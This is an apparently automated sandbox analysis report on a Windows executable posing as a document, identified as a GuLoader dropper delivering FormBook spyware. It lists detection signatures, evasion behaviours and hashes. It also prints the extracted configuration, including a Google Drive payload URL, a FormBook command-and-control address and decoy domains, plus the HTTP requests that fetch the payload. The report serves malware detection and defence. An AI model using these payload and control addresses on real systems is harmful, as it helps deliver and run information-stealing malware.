Windows Analysis Report Original Doc Ref SN02853801324189923.exe

Overview

General Information

Sample Name: Original Doc Ref SN02853801324189923.exe
Analysis ID: 542742
MD5: 2b40b86c870ab6b0e9b08f26bd231e1a
SHA1: 78a6fc51761c25fe571fec37ca4beaa13d7b5d48
SHA256: 6c9c9bd77d704ca8c48a0125289e0e15e75f62f09d40ffad58a24bd96c3a57c0
Tags: exeguloaderxloader
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000002.00000002.482011607.00000000029E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1vqWz"}
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}
Multi AV Scanner detection for submitted file
Source: Original Doc Ref SN02853801324189923.exe Virustotal: Detection: 29% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: www.thesocialmediacreator.com/i638/ Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Virustotal: Detection: 32% Perma Link
Machine Learning detection for sample
Source: Original Doc Ref SN02853801324189923.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC2DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00FC2DAE

Compliance:

barindex
Uses 32bit PE files
Source: Original Doc Ref SN02853801324189923.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.7:49831 version: TLS 1.2
Source: Original Doc Ref SN02853801324189923.exe Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wextract.pdb source: Original Doc Ref SN02853801324189923.exe
Source: Binary string: wntdll.pdbUGP source: Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Semiha.exe, Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source: Binary string: wextract.pdbPp source: Original Doc Ref SN02853801324189923.exe
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC21E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00FC21E7
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File opened: C:\Users\user~1\AppData\ Jump to behavior

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.thesocialmediacreator.com/i638/
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1vqWz
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8i4krmmckqtjah3e0j55ac599/1640006700000/05208698352720309252/*/1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-80-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: Semiha.exe, 00000019.00000003.741035770.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742494256.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740971825.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779249493.0000000000940000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742345696.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742566992.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740899622.0000000000942000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742408013.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001C.00000000.747255053.0000000006870000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000002.767904819.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Semiha.exe, 00000019.00000003.741011877.0000000000981000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740899622.0000000000942000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742044395.0000000000980000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Semiha.exe, 00000019.00000003.741011877.0000000000981000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740899622.0000000000942000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742044395.0000000000980000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/
Source: Semiha.exe, 00000019.00000003.742044395.0000000000980000.00000004.00000001.sdmp String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8
Source: Semiha.exe, 00000019.00000003.741035770.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742494256.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740971825.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779249493.0000000000940000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742345696.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742566992.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742408013.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/g
Source: Semiha.exe, 00000019.00000003.741035770.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742494256.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740971825.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779249493.0000000000940000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742345696.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742566992.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742408013.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/z
Source: Semiha.exe, 00000019.00000003.740959193.000000000093C000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0Ew
Source: Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742377343.0000000000916000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl
Source: Semiha.exe, 00000019.00000003.742532708.0000000000916000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779196860.0000000000917000.00000004.00000020.sdmp, Semiha.exe, 00000019.00000003.742377343.0000000000916000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKlNE-%&
Source: Semiha.exe, 00000019.00000003.742532708.0000000000916000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779196860.0000000000917000.00000004.00000020.sdmp, Semiha.exe, 00000019.00000003.742377343.0000000000916000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKljD
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8i4krmmckqtjah3e0j55ac599/1640006700000/05208698352720309252/*/1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-80-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.7:49831 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: Original Doc Ref SN02853801324189923.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC1DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_00FC1DC7
Detected potential crypto function
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC5B88 0_2_00FC5B88
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029EE085 2_2_029EE085
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029EA432 2_2_029EA432
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E6E30 25_2_1E7E6E30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7FEBB0 25_2_1E7FEBB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E881002 25_2_1E881002
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7DB090 25_2_1E7DB090
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7C0D20 25_2_1E7C0D20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7E4120 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E7CF900 25_2_1E7CF900
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E891D55 25_2_1E891D55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_0056E085 25_2_0056E085
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_0056A432 25_2_0056A432
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 2_2_029EE085 NtResumeThread, 2_2_029EE085
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8096E0 NtFreeVirtualMemory,LdrInitializeThunk, 25_2_1E8096E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809660 NtAllocateVirtualMemory,LdrInitializeThunk, 25_2_1E809660
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809780 NtMapViewOfSection,LdrInitializeThunk, 25_2_1E809780
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809FE0 NtCreateMutant,LdrInitializeThunk, 25_2_1E809FE0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809860 NtQuerySystemInformation,LdrInitializeThunk, 25_2_1E809860
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8099A0 NtCreateSection,LdrInitializeThunk, 25_2_1E8099A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809910 NtAdjustPrivilegesToken,LdrInitializeThunk, 25_2_1E809910
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809A80 NtOpenDirectoryObject, 25_2_1E809A80
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8096D0 NtCreateKey, 25_2_1E8096D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809A00 NtProtectVirtualMemory, 25_2_1E809A00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809610 NtEnumerateValueKey, 25_2_1E809610
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809A10 NtQuerySection, 25_2_1E809A10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809A20 NtResumeThread, 25_2_1E809A20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809650 NtQueryValueKey, 25_2_1E809650
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809A50 NtCreateFile, 25_2_1E809A50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809670 NtQueryInformationProcess, 25_2_1E809670
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8097A0 NtUnmapViewOfSection, 25_2_1E8097A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E80A3B0 NtGetContextThread, 25_2_1E80A3B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809B00 NtSetValueKey, 25_2_1E809B00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E80A710 NtOpenProcessToken, 25_2_1E80A710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809710 NtQueryInformationToken, 25_2_1E809710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809730 NtQueryVirtualMemory, 25_2_1E809730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809760 NtOpenProcess, 25_2_1E809760
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809770 NtSetInformationFile, 25_2_1E809770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E80A770 NtOpenThread, 25_2_1E80A770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8098A0 NtWriteVirtualMemory, 25_2_1E8098A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8098F0 NtReadVirtualMemory, 25_2_1E8098F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809820 NtEnumerateKey, 25_2_1E809820
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809840 NtDelayExecution, 25_2_1E809840
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E80B040 NtSuspendThread, 25_2_1E80B040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8099D0 NtCreateProcessEx, 25_2_1E8099D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8095D0 NtClose, 25_2_1E8095D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E8095F0 NtQueryInformationFile, 25_2_1E8095F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809520 NtWaitForSingleObject, 25_2_1E809520
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E80AD30 NtSetContextThread, 25_2_1E80AD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809540 NtReadFile, 25_2_1E809540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809950 NtQueueApcThread, 25_2_1E809950
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_1E809560 NtWriteFile, 25_2_1E809560
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_00563133 NtProtectVirtualMemory, 25_2_00563133
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Code function: 25_2_0056E7CC NtProtectVirtualMemory, 25_2_0056E7CC
PE file contains executable resources (Code or Archives)
Source: Original Doc Ref SN02853801324189923.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 66519 bytes, 1 file
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Original Doc Ref SN02853801324189923.exe Binary or memory string: OriginalFilename vs Original Doc Ref SN02853801324189923.exe
Source: Original Doc Ref SN02853801324189923.exe, 00000000.00000002.485465711.0000000000FCA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Original Doc Ref SN02853801324189923.exe
Source: Original Doc Ref SN02853801324189923.exe, 00000000.00000000.233147704.0000000000FCA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Original Doc Ref SN02853801324189923.exe
Source: Original Doc Ref SN02853801324189923.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Original Doc Ref SN02853801324189923.exe
PE file contains strange resources
Source: Original Doc Ref SN02853801324189923.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Original Doc Ref SN02853801324189923.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Original Doc Ref SN02853801324189923.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Semiha.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Original Doc Ref SN02853801324189923.exe Virustotal: Detection: 29%
Source: Original Doc Ref SN02853801324189923.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe "C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe"
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC1DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_00FC1DC7
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/1@2/2
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC5849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00FC5849
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC5849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00FC5849
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Code function: 0_2_00FC4E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA, 0_2_00FC4E80
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe Command line argument: Kernel32.dll 0_2_00FC2A7E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Original Doc Ref SN02853801324189923.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
